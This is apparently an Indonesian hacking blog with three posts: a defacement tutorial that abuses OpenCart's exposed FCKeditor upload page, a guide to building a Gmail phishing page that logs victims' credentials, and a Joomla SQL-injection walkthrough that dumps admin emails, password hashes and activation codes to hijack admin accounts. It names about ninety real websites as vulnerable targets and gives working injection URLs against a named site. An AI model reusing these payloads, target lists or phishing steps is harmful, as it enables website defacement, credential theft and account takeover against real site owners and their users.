Loading...

Senin, 09 Juli 2012

0 Deface web "powered by Aditya Newbie"

Diposting oleh aditya8187 di 06.15
langsung aja...

dork : Powered By OpenCart site:com

"site:" terserah, yang penting support opencart

ex target: http://www.superbikecarbonparts.com/

bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nyaex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jdi nya gni
ex: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

skrng liat hasilnya....

ex hasil: http://www.superbikecarbonparts.com/k4ton.html

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..




Nih Gw Kasi Bnyk Sitesite Vulnnya :D :


Daftar website yang Vulnrable :
  1. http://www.xuhongmrw.com/theanimeshop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  2. http://www.ugsdeportes.com.ar//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.htm
  3. http://www.dacdisenios.com.ar/tienda//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  4. http://www.lubetlenceria.com/ventas/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  5. http://www.ugsdeportes.com.ar/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  6. http://www.dacdisenios.com.ar/tienda/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  7. http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  8. http://www.ottimotohk.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
10.  http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
11.  http://www.brooktroutstore.com.hk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
12.  http://www.karens-shop.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
13.  http://hana-yi.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
14.  http://www.xpalpower.com.tw/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
15.  http://www.thespaberry.com/store//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
16.  http://www.fresh89.com/swag/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
17.  http://www.connectix.ca/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
18.  http://baliclothingexporter.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
19.  http://www.binksyandbobo.com/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
20.  http://thebestnetbook.net/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
21.  http://livingpraise.org/OpenCart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
22.  http://www.123alternatives.net/opcart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
23.  http://leszak.net/opcart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
24.  http://babytaif.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
25.  http://ciaoservices.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
26.  http://77.93.249.148/upload//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
27.  http://www.mornord.altervista.org/php5//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
28.  http://www.medinatsrl.com/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
29.  http://www.eolowindsurf.com/eolotheshop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
30.  http://www.medinatsrl.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
31.  http://www.pestoportofino.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
32.  http://www.friulianproducts.com/Store3//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
33.  http://www.planespares.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
34.  http://www.electronicaymas.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
35.  http://www.ufficio2000.biz/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
36.  http://www.computer-planet.it//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
37.  http://www.prodottimolisani.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
38.  http://www.pccommerce.it/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
39.  http://www.electronicaymas.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
40.  http://www.mornord.altervista.org/php5/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
41.  http://www.iostampo.eu/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
42.  http://www.disulmona.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
43.  http://www.nwtech.it/digitime/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
44.  http://www.piscine-atlantis.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
45.  http://www.secret0.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
46.  http://wolfi.it/wolfi/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
47.  http://www.disulmona.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
48.  http://www.superbikecarbonparts.com//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
49.  http://www.nwtech.it/digitime//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
50.  http://www.assistenzameccanica.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
51.  http://www.vendografica.biz/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
52.  http://www.iostampo.eu/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
53.  http://www.oriensanimali.com/public/ec/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
54.  http://vshop.vitagelworld.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
55.  http://plusweb.bedestencarsi.com/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
56.  http://shop.faye-ligui.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
57.  http://www.biowoman-us.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
58.  http://myselfforward.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
59.  http://citynkr.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
60.  http://www.library-mobile.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
61.  http://thailandcarving.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
62.  http://harddisktohome.in.th/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
63.  http://www.pattayaasset.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
64.  http://myselfforward.com//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
65.  http://harddisktohome.in.th/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
66.  http://www.alwasat4pc.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
67.  http://www.e-cigareta.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
68.  http://ecommerce.ticinodesign.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
69.  http://www.chesspoint.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
70.  http://www.windelbaby.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
71.  http://www.e-cigareta.ch//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
72.  http://www.mammarosa.com.ec/mmr/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
73.  http://prodrivershop.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
74.  http://www.asripahshop.com/v2//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
75.  http://112.137.163.164/xkl//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
76.  http://morethanwords.my/
77.  http://www.spacetytanium.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
78.  http://www.avocadogenie.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
79.  http://www.bestonlinediscounts.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
80.  http://eesnet.org/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
81.  http://hobby-fillately.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
82.  http://www.granmasantiques.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
83.  http://zhongvua.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
84.  http://mcgearusa.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
85.  http://utahflowers.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
86.  http://amourcristallis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
87.  http://wiretek.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
88.  http://www.shotgunstock.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
89.  http://www.justhouda.com/oc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
90.  http://virtualgeorge.info/132test/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
91.  http://volomilano.altervista.org/upload//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.htmlMonggo dicoba mas mas :D siapa tau belum banyak yg dipatch :v hehejangan malas cari digoogle kak buat site vuln yg lain :D thankss
Label: .

0 Phishing - Creating,uploading and using fake login pages

Diposting oleh aditya8187 di 06.13
mau share lagi =))
before continuing, please provide a translation google :D

I could simply give you the fake page generators or already made fake web pages but I want you to manually create yourself.

First, I shoud tell you the basic methodology of making phishing page of
any website. In a website where the users are supposed to enter/submit
any data (data might be email,password or anything), there is a piece of
code in html code called as action form. It looks like this
<form method="POST" action="something">.
You can find this out by simply viewing the source of web page. Right
click on webpage to do so. "something" here in the action field is name
or path of the file where submitted data goes. So the idea of fake login page is simple. Just download the webpage on your computer, modify the action field
to change the path where data goes according to yourself, upload this
modified webpage on any web hosting site and you are done. :) I have taken example of gmail. Download a php file and a text file fromhttp://www.ziddu.com/download/13323817/explore.rar.html which would be required. password: explorehacking.com

Setps to make a phishing/fake login page :-

1. First of all, sign up for a account at any free webhosting site like my3gb.com,ripway.com,110mb.com etc. I have chosen my3gb.com

2.Goto www.gmail.com.  Click on 'Save page as' option  and save
the complete web page. You must have got a html file and a folder in
which there must be two images.


3. Open the html file in any text editor like wordpad or notepad. Press "Ctrl+F"  to search for word "action".


4. Replace the link in action field by "explore.php" and save it.


5. Go to File Manager and Upload this html file ,hacked.txt , explore.php  on your web hosting site.

Note: Make a new directory with name exactly same as name of folder in which images are there.
Upload the images in that directory

Now you can test whether it works or not. Just visit your fake login page.It must be http://username.my3gb.com/filename.html. Enter any username and password , you will be redirected to real gmail webpage.The data must have been saved in hacked.txt

Note: You can see the code of explore.php . There is a line like header:"location: path". It is
actually the path where victim would be redirected after submitting data. You can change it as per your need.


oke , selamat Mncoba Saudara ku ^_^narekk becak lagii ah .! :P =))
Label: .

0 Exploit Joomla

Diposting oleh aditya8187 di 06.11
ga sengaja tadi jalan2 nemu exploit, bagi yang udah tau maaf
yah ane hanya ingin berbagi aja, berbagi itu indah :D
jangan malas
yah cari di goolge :D ======
=step1=
======

coba
kita cari di google dengan dork ini :
inurl:"index.php
option=com_ignitegallery"
======
=step2=
======

pasang
exploitnya exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

contoh
: http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

nah
muncul kan tuh :D
======
=step3=
======

coba
kita reset password nya
sekarang kita reset
password dengan menggunakan exploit ini : /index.php?option=com_user&view=reset


hm..
minta email dia.. masukin aja email admin tadi..
enter
deh :D
======
=step4=
======

wah
minta activation pula, tenang kita cari dulu activationnya :D
exploit
: index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--


tuh
kan kluar activatifasinya :D
======
=step5=
======

copas
aja ke yang tadi lalu enter :D
======
=step6=
======

sekarang
meminta password baru :D
======
=step7=
======

oke
langsung ke taham berikutnya, sekarang kita masuk ke adminnya http://www.kaikourafishing.co.nz/administrator/
Label: .
Langganan: Postingan (Atom)
 
ADITYA NEWBIE | Copyright © 2012 | Designer Template by Aditya newbie & Indonesian Blogger™